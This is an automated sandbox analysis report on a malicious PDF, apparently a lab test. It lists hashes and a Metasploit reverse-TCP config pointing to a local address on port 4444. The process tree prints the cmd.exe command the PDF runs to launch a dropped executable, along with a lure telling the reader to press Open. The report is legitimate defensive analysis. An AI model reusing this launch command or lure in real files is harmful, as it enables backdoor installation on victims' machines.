Overview

overview

10

Static

static

10

TFG_modificado.pdf

windows7_x64

10

TFG_modificado.pdf

windows10-2004_x64

1

TFG.exe

windows7_x64

1

TFG.exe

windows10-2004_x64

1

Resubmissions

22-05-2022 17:58

220522-wj59zaebak 10

22-05-2022 16:50

220522-vb7x6aaff6 10

Analysis

  • max time kernel
    145s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    22-05-2022 16:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TFG_modificado.pdf

  • Size

    105KB

  • MD5

    3f40220500ee4514ca088297e70613ed

  • SHA1

    07e9ed05f62671596688c37eaffca357b25969ea

  • SHA256

    53b43327329e3199b64f29d34de75c2d345e43fc7b42e4b74ecceec81575b205

  • SHA512

    c4988c1ee38d3ceb22c616d6c943b79148721590a8efe38172098eac9b5259fb6e700ced4ae967ec6816cea1159c29dd327c2cf44e78a90b5919d5888e9108c2

Score
10/10
metasploitbackdoortrojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

10.0.2.15:4444

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies registry class 31 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\TFG_modificado.pdf"
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\TFG.pdf" (cd "Desktop"))&(if exist "My Documents\TFG.pdf" (cd "My Documents"))&(if exist "Documents\TFG.pdf" (cd "Documents"))&(if exist "Escritorio\TFG.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\TFG.pdf" (cd "Mis Documentos"))&(start TFG.pdf) To view the encrypted content please tick the "Do not show this message again" box and press Open.
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1244
      • \??\c:\Users\Admin\Documents\TFG.pdf
        TFG.pdf
        3⤵
        • Executes dropped EXE
        PID:1860

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\Documents\TFG.pdf
    Filesize

    72KB

    MD5

    c8eda58fbac22e5b0d33f547c858b9f1

    SHA1

    143df53b62f5b2eb2bb2cd2bd70c7882c1c3df2d

    SHA256

    178d1de119f2315d86e78d16e81d34544fbccae169b1d30db4db1be5e82a4574

    SHA512

    6de0398890ed6cbd05459b7308d9e7265f53bc42f4ea7472be0a7ea0e846224c3a3cfcd7387b06ebe7630d52c7bf211e5dd9409d13f0c535781d1654c1c0c72d

    Download Submit
  • \??\c:\Users\Admin\Documents\TFG.pdf
    Filesize

    72KB

    MD5

    c8eda58fbac22e5b0d33f547c858b9f1

    SHA1

    143df53b62f5b2eb2bb2cd2bd70c7882c1c3df2d

    SHA256

    178d1de119f2315d86e78d16e81d34544fbccae169b1d30db4db1be5e82a4574

    SHA512

    6de0398890ed6cbd05459b7308d9e7265f53bc42f4ea7472be0a7ea0e846224c3a3cfcd7387b06ebe7630d52c7bf211e5dd9409d13f0c535781d1654c1c0c72d

    Download Submit
  • \Users\Admin\Documents\TFG.pdf
    Filesize

    72KB

    MD5

    c8eda58fbac22e5b0d33f547c858b9f1

    SHA1

    143df53b62f5b2eb2bb2cd2bd70c7882c1c3df2d

    SHA256

    178d1de119f2315d86e78d16e81d34544fbccae169b1d30db4db1be5e82a4574

    SHA512

    6de0398890ed6cbd05459b7308d9e7265f53bc42f4ea7472be0a7ea0e846224c3a3cfcd7387b06ebe7630d52c7bf211e5dd9409d13f0c535781d1654c1c0c72d

    Download Submit
  • \Users\Admin\Documents\TFG.pdf
    Filesize

    72KB

    MD5

    c8eda58fbac22e5b0d33f547c858b9f1

    SHA1

    143df53b62f5b2eb2bb2cd2bd70c7882c1c3df2d

    SHA256

    178d1de119f2315d86e78d16e81d34544fbccae169b1d30db4db1be5e82a4574

    SHA512

    6de0398890ed6cbd05459b7308d9e7265f53bc42f4ea7472be0a7ea0e846224c3a3cfcd7387b06ebe7630d52c7bf211e5dd9409d13f0c535781d1654c1c0c72d

    Download Submit
  • memory/1244-55-0x0000000000000000-mapping.dmp
    Download
  • memory/1688-54-0x0000000076391000-0x0000000076393000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1860-59-0x0000000000000000-mapping.dmp
    Download